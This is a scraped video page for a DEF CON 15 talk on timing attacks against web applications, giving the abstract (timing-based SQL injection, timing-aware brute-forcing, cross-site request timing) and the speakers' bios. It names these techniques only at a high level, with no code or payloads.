Loading...

DEF CON 15 - Meer and Slaviero - Its All About the Timing

176 views

Loading...

Loading...

Transcript

The interactive transcript could not be loaded.

Loading...

Loading...

Rating is available when the video has been rented.
This feature is not available right now. Please try again later.
Published on Feb 4, 2014

Haroon Meer & Marco Slaviero: It's All About the Timing

Timing attacks have been exploited in the wild for ages. In recent times timing attacks have largely been relegated to use only by cryptographers and cryptanalysts. In this presentation SensePost analysts will show that timing attacks are still very much alive and kicking on the Internet and fairly prevalent in web applications (if only we were looking for them). The talk will cover SensePost-aTime (our new SQL Injection tool that operates purely on timing differences to extract data from injectable sites behind draconian firewall rulesets), our new generic (timing aware) web brute-forcer and lots of new twists on old favorites. We will discuss the implications of timing on current JavaScript malware discussing XSRT (Cross Site Request Timing)(because we can never have too many acronyms!) and will demonstrate how reasonably effective this is against the "Same Origin Policy".

If you are doing testing today, and are not thinking a lot about timing, chances are you are missing attack vectors right beneath your stop-watch!

Haroon Meer is the Technical Director of SensePost. He joined SensePost in 2001 and has not slept since his early childhood. He has co-authored several technical books on Information Security and has spoken and trained at conferences around the world. He has played in most aspects of IT Security from development to deployment and currently gets his kicks from reverse engineering, application assessments and similar forms of pain.

Marco Slaviero is a senior security analyst, avid reader and recovering student. He is currently a PHd candidate and a valuable member of SensePosts Security Assessment team. He doesn't smoke and is rumored to harbor personal animosity towards figs.

Loading...

When autoplay is enabled, a suggested video will automatically play next.

Up next


to add this to Watch Later

Add to

Loading playlists...